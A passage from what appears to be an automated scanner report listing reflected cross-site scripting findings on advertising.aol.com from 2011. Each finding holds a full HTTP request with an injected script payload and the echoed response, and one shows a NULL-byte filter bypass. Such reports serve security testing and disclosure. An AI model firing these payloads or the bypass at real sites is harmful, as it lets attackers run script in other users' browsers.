User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3d8b9"-alert(1)-"6eecb609471/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.58. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf03"><script>alert(1)</script>3eb5e78913b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5bf03"><script>alert(1)</script>3eb5e78913b/7/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/5bf03"><script>alert(1)</script>3eb5e78913b/7/4/1/" />
...[SNIP]...

4.59. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bccd4"-alert(1)-"20d13911a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bccd4"-alert(1)-"20d13911a60/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bccd4"-alert(1)-"20d13911a60/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.60. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17768"><script>alert(1)</script>d9ef3f9913f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /17768"><script>alert(1)</script>d9ef3f9913f/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/17768"><script>alert(1)</script>d9ef3f9913f/8/4/1/" />
...[SNIP]...

4.61. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f67fb"><script>alert(1)</script>c3e09f6c64d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naif67fb"><script>alert(1)</script>c3e09f6c64d/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:44:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:44:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/naif67fb"><script>alert(1)</script>c3e09f6c64d/nai.php?action_id=3" />
...[SNIP]...

4.62. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88df7"-alert(1)-"dba33f7ee0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai88df7"-alert(1)-"dba33f7ee0e/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:44:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:44:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai88df7"-alert(1)-"dba33f7ee0e/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,ad
...[SNIP]...

4.63. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a107"-alert(1)-"5790374bb49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/nai.php6a107"-alert(1)-"5790374bb49?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:45:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:45:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php6a107"-alert(1)-"5790374bb49?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisin
...[SNIP]...

4.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40c6"><script>alert(1)</script>dfa626667ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/nai.phpc40c6"><script>alert(1)</script>dfa626667ea?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:45:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:45:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/nai/nai.phpc40c6"><script>alert(1)</script>dfa626667ea?action_id=3" />
...[SNIP]...

4.65. http://advertising.aol.com/nai/nai.php [action_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the action_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %0060c4f'><script>alert(1)</script>607e346f05e was submitted in the action_id parameter. This input was echoed as 60c4f'><script>alert(1)</script>607e346f05e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /nai/nai.php?action_id=3%0060c4f'><script>alert(1)</script>607e346f05e HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13896


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3.60c4f'><script>alert(1)</script>607e346f05e&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=8281580' height='1' width='1'>
...[SNIP]...

4.66. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1812733584/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdd"-alert(1)-"56c415e6812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bfbdd"-alert(1)-"56c415e6812/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:15:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:15:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bfbdd"-alert(1)-"56c415e6812/0/2/1812733584/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.67. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1812733584/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b81e"><script>alert(1)</script>15b2c30d857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7b81e"><script>alert(1)</script>15b2c30d857/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:15:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:15:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/7b81e"><script>alert(1)</script>15b2c30d857/0/2/1812733584/" />
...[SNIP]...

4.68. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/295357155/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c934"-alert(1)-"95baf5a60d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c934"-alert(1)-"95baf5a60d2/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
